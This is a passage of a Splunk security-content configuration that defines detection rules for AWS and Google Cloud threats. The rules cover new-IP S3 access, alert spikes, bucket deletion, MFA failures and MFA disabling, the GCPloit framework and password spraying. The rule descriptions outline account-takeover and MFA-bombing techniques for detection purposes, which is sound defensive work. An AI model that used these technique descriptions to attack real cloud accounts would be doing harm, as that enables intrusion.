1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_s3_accesslogs` http_status=200 [search `aws_s3_accesslogs` http_status=200 | stats earliest(_time) as firstTime latest(_time) as lastTime by bucket_name remote_ip | inputlookup append=t previously_seen_S3_access_from_remote_ip | stats min(firstTime) as firstTime, max(lastTime) as lastTime by bucket_name remote_ip | outputlookup previously_seen_S3_access_from_remote_ip| eval newIP=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newIP=1 | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | table bucket_name remote_ip]| iplocation remote_ip |rename remote_ip as src_ip | table _time bucket_name src_ip City Country operation request_uri | `detect_s3_access_from_a_new_ip_filter` [ESCU - Detect Spike in AWS Security Hub Alerts for EC2 Instance - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for a spike in number of of AWS security Hub alerts for an EC2 instance in 4 hours intervals action.escu.mappings = {"cis20": ["CIS 10"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for a spike in number of of AWS security Hub alerts for an EC2 instance in 4 hours intervals action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your Security Hub inputs. The threshold_value should be tuned to your environment and schedule these searches according to the bucket span interval. action.escu.known_false_positives = None action.escu.creation_date = 2021-01-26 action.escu.modification_date = 2021-01-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Spike in AWS Security Hub Alerts for EC2 Instance - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["AWS Security Hub Alerts"] action.risk = 1 action.risk.param._risk_message = Spike in AWS security Hub alerts with title $Title$ for EC2 instance $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Detect Spike in AWS Security Hub Alerts for EC2 Instance - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Security Hub Alerts"], "cis20": ["CIS 10"], "confidence": 50, "impact": 30, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_securityhub_finding` "Resources{}.Type"=AWSEC2Instance | bucket span=4h _time | stats count AS alerts values(Title) as Title values(Types{}) as Types values(vendor_account) as vendor_account values(vendor_region) as vendor_region values(severity) as severity by _time dest | eventstats avg(alerts) as total_alerts_avg, stdev(alerts) as total_alerts_stdev | eval threshold_value = 3 | eval isOutlier=if(alerts > total_alerts_avg+(total_alerts_stdev * threshold_value), 1, 0) | search isOutlier=1 | table _time dest alerts Title Types vendor_account vendor_region severity isOutlier total_alerts_avg | `detect_spike_in_aws_security_hub_alerts_for_ec2_instance_filter` [ESCU - Detect Spike in AWS Security Hub Alerts for User - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for a spike in number of of AWS security Hub alerts for an AWS IAM User in 4 hours intervals. action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for a spike in number of of AWS security Hub alerts for an AWS IAM User in 4 hours intervals. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your Security Hub inputs. The threshold_value should be tuned to your environment and schedule these searches according to the bucket span interval. action.escu.known_false_positives = None action.escu.creation_date = 2021-01-26 action.escu.modification_date = 2021-01-26 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Spike in AWS Security Hub Alerts for User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["AWS Security Hub Alerts"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Spike in AWS Security Hub Alerts for User - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Security Hub Alerts"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `aws_securityhub_finding` "findings{}.Resources{}.Type"= AwsIamUser | rename findings{}.Resources{}.Id as user | bucket span=4h _time | stats count AS alerts by _time user | eventstats avg(alerts) as total_launched_avg, stdev(alerts) as total_launched_stdev | eval threshold_value = 2 | eval isOutlier=if(alerts > total_launched_avg+(total_launched_stdev * threshold_value), 1, 0) | search isOutlier=1 | table _time user alerts |`detect_spike_in_aws_security_hub_alerts_for_user_filter` [ESCU - Detect Spike in blocked Outbound Traffic from your AWS - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search will detect spike in blocked outbound network connections originating from within your AWS environment. It will also update the cache file that factors in the latest data. action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search will detect spike in blocked outbound network connections originating from within your AWS environment. It will also update the cache file that factors in the latest data. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your VPC Flow logs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the number of data points required to meet the definition of "spike." The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike. This search works best when you run the "Baseline of Blocked Outbound Connection" support search once to create a history of previously seen blocked outbound connections. action.escu.known_false_positives = The false-positive rate may vary based on the values of`dataPointThreshold` and `deviationThreshold`. Additionally, false positives may result when AWS administrators roll out policies enforcing network blocks, causing sudden increases in the number of blocked outbound connections. action.escu.creation_date = 2018-05-07 action.escu.modification_date = 2018-05-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Spike in blocked Outbound Traffic from your AWS - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["AWS Network ACL Activity", "Suspicious AWS Traffic", "Command And Control"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Spike in blocked Outbound Traffic from your AWS - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Network ACL Activity", "Suspicious AWS Traffic", "Command And Control"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudwatchlogs_vpcflow` action=blocked (src_ip=10.0.0.0/8 OR src_ip=172.16.0.0/12 OR src_ip=192.168.0.0/16) ( dest_ip!=10.0.0.0/8 AND dest_ip!=172.16.0.0/12 AND dest_ip!=192.168.0.0/16) [search `cloudwatchlogs_vpcflow` action=blocked (src_ip=10.0.0.0/8 OR src_ip=172.16.0.0/12 OR src_ip=192.168.0.0/16) ( dest_ip!=10.0.0.0/8 AND dest_ip!=172.16.0.0/12 AND dest_ip!=192.168.0.0/16) | stats count as numberOfBlockedConnections by src_ip | inputlookup baseline_blocked_outbound_connections append=t | fields - latestCount | stats values(*) as * by src_ip | rename numberOfBlockedConnections as latestCount | eval newAvgBlockedConnections=avgBlockedConnections + (latestCount-avgBlockedConnections)/720 | eval newStdevBlockedConnections=sqrt(((pow(stdevBlockedConnections, 2)*719 + (latestCount-newAvgBlockedConnections)*(latestCount-avgBlockedConnections))/720)) | eval avgBlockedConnections=coalesce(newAvgBlockedConnections, avgBlockedConnections), stdevBlockedConnections=coalesce(newStdevBlockedConnections, stdevBlockedConnections), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table src_ip, latestCount, numDataPoints, avgBlockedConnections, stdevBlockedConnections | outputlookup baseline_blocked_outbound_connections | eval dataPointThreshold = 5, deviationThreshold = 3 | eval isSpike=if((latestCount > avgBlockedConnections+deviationThreshold*stdevBlockedConnections) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | table src_ip] | stats values(dest_ip) as "Blocked Destination IPs", values(interface_id) as "resourceId" count as numberOfBlockedConnections, dc(dest_ip) as uniqueDestConnections by src_ip | `detect_spike_in_blocked_outbound_traffic_from_your_aws_filter` [ESCU - Detect Spike in S3 Bucket deletion - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search detects users creating spikes in API activity related to deletion of S3 buckets in your AWS environment. It will also update the cache file that factors in the latest data. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search detects users creating spikes in API activity related to deletion of S3 buckets in your AWS environment. It will also update the cache file that factors in the latest data. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. You can modify `dataPointThreshold` and `deviationThreshold` to better fit your environment. The `dataPointThreshold` variable is the minimum number of data points required to have a statistically significant amount of data to determine. The `deviationThreshold` variable is the number of standard deviations away from the mean that the value must be to be considered a spike. This search works best when you run the "Baseline of S3 Bucket deletion activity by ARN" support search once to create a baseline of previously seen S3 bucket-deletion activity. action.escu.known_false_positives = Based on the values of`dataPointThreshold` and `deviationThreshold`, the false positive rate may vary. Please modify this according the your environment. action.escu.creation_date = 2018-11-27 action.escu.modification_date = 2018-11-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Detect Spike in S3 Bucket deletion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious AWS S3 Activities"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Detect Spike in S3 Bucket deletion - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious AWS S3 Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1530"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=DeleteBucket [search `cloudtrail` eventName=DeleteBucket | spath output=arn path=userIdentity.arn | stats count as apiCalls by arn | inputlookup s3_deletion_baseline append=t | fields - latestCount | stats values(*) as * by arn | rename apiCalls as latestCount | eval newAvgApiCalls=avgApiCalls + (latestCount-avgApiCalls)/720 | eval newStdevApiCalls=sqrt(((pow(stdevApiCalls, 2)*719 + (latestCount-newAvgApiCalls)*(latestCount-avgApiCalls))/720)) | eval avgApiCalls=coalesce(newAvgApiCalls, avgApiCalls), stdevApiCalls=coalesce(newStdevApiCalls, stdevApiCalls), numDataPoints=if(isnull(latestCount), numDataPoints, numDataPoints+1) | table arn, latestCount, numDataPoints, avgApiCalls, stdevApiCalls | outputlookup s3_deletion_baseline | eval dataPointThreshold = 15, deviationThreshold = 3 | eval isSpike=if((latestCount > avgApiCalls+deviationThreshold*stdevApiCalls) AND numDataPoints > dataPointThreshold, 1, 0) | where isSpike=1 | rename arn as userIdentity.arn | table userIdentity.arn] | spath output=user userIdentity.arn | spath output=bucketName path=requestParameters.bucketName | stats values(bucketName) as bucketName, count as numberOfApiCalls, dc(eventName) as uniqueApisCalled by user | `detect_spike_in_s3_bucket_deletion_filter` [ESCU - GCP Authentication Failed During MFA Challenge - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an authentication attempt event against a Google Cloud Platform tenant that fails during the Multi Factor Authentication challenge. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an authentication attempt event against a Google Cloud Platform tenant that fails during the Multi Factor Authentication challenge. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Google Workspace from Splunkbase (https://splunkbase.splunk.com/app/5556) which allows Splunk administrators to collect Google Workspace event data in Splunk using Google Workspace APIs. Specifically, this analytic leverages the User log events. action.escu.known_false_positives = Legitimate users may miss to reply the MFA challenge within the time window or deny it by mistake. action.escu.creation_date = 2024-01-04 action.escu.modification_date = 2024-01-04 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Authentication Failed During MFA Challenge - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ failed to pass MFA challenge action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GCP Authentication Failed During MFA Challenge - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1078", "T1078.004", "T1621"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an authentication attempt event against a Google Cloud Platform tenant that fails during the Multi Factor Authentication challenge. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. action.notable.param.rule_title = GCP Authentication Failed During MFA Challenge action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gws_reports_login` event.name=login_failure `gws_login_mfa_methods` | stats count min(_time) as firstTime max(_time) as lastTime by user, src_ip, login_challenge_method | `gcp_authentication_failed_during_mfa_challenge_filter` [ESCU - GCP Detect gcploit framework - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides detection of GCPloit exploitation framework. This framework can be used to escalate privileges and move laterally from compromised high privilege accounts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.CM"]} action.escu.data_models = ["Email"] action.escu.eli5 = This search provides detection of GCPloit exploitation framework. This framework can be used to escalate privileges and move laterally from compromised high privilege accounts. action.escu.how_to_implement = You must install splunk GCP add-on. This search works with gcp:pubsub:message logs action.escu.known_false_positives = Payload.request.function.timeout value can possibly be match with other functions or requests however the source user and target request account may indicate an attempt to move laterally accross acounts or projects action.escu.creation_date = 2020-10-08 action.escu.modification_date = 2020-10-08 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Detect gcploit framework - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Cross Account Activity"] action.risk = 1 action.risk.param._risk_message = tbd action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - GCP Detect gcploit framework - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Cross Account Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search provides detection of GCPloit exploitation framework. This framework can be used to escalate privileges and move laterally from compromised high privilege accounts. action.notable.param.rule_title = GCP Detect gcploit framework action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` data.protoPayload.request.function.timeout=539s | table src src_user data.resource.labels.project_id data.protoPayload.request.function.serviceAccountEmail data.protoPayload.authorizationInfo{}.permission data.protoPayload.request.location http_user_agent | `gcp_detect_gcploit_framework_filter` [ESCU - GCP Kubernetes cluster pod scan detection - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search provides information of unauthenticated requests via user agent, and authentication data against Kubernetes cluster's pods action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search provides information of unauthenticated requests via user agent, and authentication data against Kubernetes cluster's pods action.escu.how_to_implement = You must install the GCP App for Splunk (version 2.0.0 or later), then configure stackdriver and set a Pub/Sub subscription to be imported to Splunk. action.escu.known_false_positives = Not all unauthenticated requests are malicious, but frequency, User Agent, source IPs and pods will provide context. action.escu.creation_date = 2020-07-17 action.escu.modification_date = 2020-07-17 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Kubernetes cluster pod scan detection - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["Kubernetes Scanning Activity"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - GCP Kubernetes cluster pod scan detection - Rule action.correlationsearch.annotations = {"analytic_story": ["Kubernetes Scanning Activity"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1526"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `google_gcp_pubsub_message` category=kube-audit |spath input=properties.log |search responseStatus.code=401 |table sourceIPs{} userAgent verb requestURI responseStatus.reason properties.pod | `gcp_kubernetes_cluster_pod_scan_detection_filter` [ESCU - GCP Multi-Factor Authentication Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an attempt to disable multi-factor authentication for a GCP user. An adversary who has obtained access to an GCP tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1556", "T1556.006"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an attempt to disable multi-factor authentication for a GCP user. An adversary who has obtained access to an GCP tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Google Workspace from Splunkbase (https://splunkbase.splunk.com/app/5556) which allows Splunk administrators to collect Google Workspace event data in Splunk using Google Workspace APIs. Specifically, this analytic leverages the Admin log events. action.escu.known_false_positives = Legitimate use case may require for users to disable MFA. Filter as needed. action.escu.creation_date = 2024-01-04 action.escu.modification_date = 2024-01-04 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Multi-Factor Authentication Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Account Takeover"] action.risk = 1 action.risk.param._risk_message = MFA disabled for User $user$ initiated by $actor.email$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 45}, {"risk_object_field": "actor.email", "risk_object_type": "other", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GCP Multi-Factor Authentication Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1556", "T1556.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an attempt to disable multi-factor authentication for a GCP user. An adversary who has obtained access to an GCP tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.notable.param.rule_title = GCP Multi-Factor Authentication Disabled action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gws_reports_admin` command=UNENROLL_USER_FROM_STRONG_AUTH | stats count min(_time) as firstTime max(_time) as lastTime by user, command, actor.email, status, id.applicationName, event.name, vendor_account, action | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `gcp_multi_factor_authentication_disabled_filter` [ESCU - GCP Multiple Failed MFA Requests For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies multiple failed multi-factor authentication requests for a single user within a Google Cloud Platform tenant. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 5 minutes. Google CLoud tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1078", "T1078.004"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies multiple failed multi-factor authentication requests for a single user within a Google Cloud Platform tenant. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 5 minutes. Google CLoud tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Google Workspace from Splunkbase (https://splunkbase.splunk.com/app/5556) which allows Splunk administrators to collect Google Workspace event data in Splunk using Google Workspace APIs. We would also recommend tuning the detection by adjusting the window `span` and `mfa_prompts` threshold values according to your environment. Specifically, this analytic leverages the User log events. action.escu.known_false_positives = Multiple Failed MFA requests may also be a sign of authentication or application issues. Filter as needed. action.escu.creation_date = 2022-10-14 action.escu.modification_date = 2022-10-14 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Multiple Failed MFA Requests For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Account Takeover"] action.risk = 1 action.risk.param._risk_message = Multiple Failed MFA requests for user $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 54}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - GCP Multiple Failed MFA Requests For User - Rule action.correlationsearch.annotations = {"analytic_story": ["GCP Account Takeover"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Weaponization", "Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1078", "T1078.004"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies multiple failed multi-factor authentication requests for a single user within a Google Cloud Platform tenant. Specifically, the analytic triggers when 10 or more MFA user prompts fail within 5 minutes. Google CLoud tenants can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.notable.param.rule_title = GCP Multiple Failed MFA Requests For User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `gws_reports_login` event.name=login_failure `gws_login_mfa_methods` | bucket span=5m _time | stats dc(_raw) AS mfa_prompts values(user) AS user by src_ip, login_challenge_method, _time | where mfa_prompts >= 10 | `gcp_multiple_failed_mfa_requests_for_user_filter` [ESCU - GCP Multiple Users Failing To Authenticate From Ip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies one source Ip failing to authenticate into the Google Workspace user accounts with more than 20 unique valid users within 5 minutes. These user accounts may have other privileges with respect to access to other sensitive resources in the Google Cloud Platform. This behavior could represent an adversary performing a Password Spraying attack against an Google Workspace environment to obtain initial access or elevate privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies one source Ip failing to authenticate into the Google Workspace user accounts with more than 20 unique valid users within 5 minutes. These user accounts may have other privileges with respect to access to other sensitive resources in the Google Cloud Platform. This behavior could represent an adversary performing a Password Spraying attack against an Google Workspace environment to obtain initial access or elevate privileges. action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Google Workspace from Splunkbase (https://splunkbase.splunk.com/app/5556) which allows Splunk administrators to collect Google Workspace event data in Splunk using Google Workspace APIs. We would also recommend tuning the detection by adjusting the window `span` and `unique_accounts` threshold values according to your environment. Specifically, this analytic leverages the User log events. action.escu.known_false_positives = No known false postives for this detection. Please review this alert. action.escu.creation_date = 2022-10-12 action.escu.modification_date = 2022-10-12 action.escu.confidence = high action.escu.full_search_name = ESCU - GCP Multiple Users Failing To Authenticate From Ip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Google Workspace", "Google Cloud Platform"] action.escu.analytic_story = ["GCP Account Takeover"] action.risk 